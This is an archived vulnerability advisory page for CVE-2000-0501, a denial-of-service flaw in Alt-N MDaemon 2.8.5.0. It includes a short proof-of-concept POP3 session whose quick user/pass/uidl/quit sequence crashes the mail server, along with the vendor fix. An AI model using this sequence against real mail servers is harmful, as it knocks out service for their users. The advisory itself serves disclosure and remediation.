Alt-N MDaemon 2.8.5.0 UIDL DoS Vulnerability

BID:1366

Info

Alt-N MDaemon 2.8.5.0 UIDL DoS Vulnerability

Bugtraq ID: 1366
Class: Boundary Condition Error
CVE: CVE-2000-0501
Remote: Yes
Local: Yes
Published: Jun 16 2000 12:00AM
Updated: Mar 19 2015 08:08AM
Credit: Posted to NTBugtraq on June 16, 2000 by Craig <[email protected]>.
Vulnerable: Alt-N MDaemon 2.8.5 0
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
Not Vulnerable: Alt-N MDaemon 3.0.4

Discussion

Alt-N MDaemon 2.8.5.0 UIDL DoS Vulnerability

A remote user is capable of crashing Alt-N MDaemon 2.8.5.0 by executing the pass command, then the UIDL command and quitting the mail server before the UIDL has returned a response. This must be done before the user is presented with the POP3 login banner. Restarting the application is required in order to regain normal functionality.

Exploit / POC

Alt-N MDaemon 2.8.5.0 UIDL DoS Vulnerability

Perform the following very quickly:

+OK &lt;target&gt; POP service ready using MDaemon
v2.8.5.0 T

User &lt;username&gt;
+OK &lt;username&gt;... Recipient ok
pass &lt;password&gt;
-ERR that command is valid only in the AUTHORIZATION state!
uidl
-ERR unknown POP command!
quit
+OK
.
quit
+OK &lt;username&gt; &lt;target&gt; POP Server signing off (mailbox empty)

Solution / Fix

Alt-N MDaemon 2.8.5.0 UIDL DoS Vulnerability

Solution:
Alt-N has rectified this issue in Mdaemon V2.8.6.0 and all later versions.

References

Alt-N MDaemon 2.8.5.0 UIDL DoS Vulnerability

References:
© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report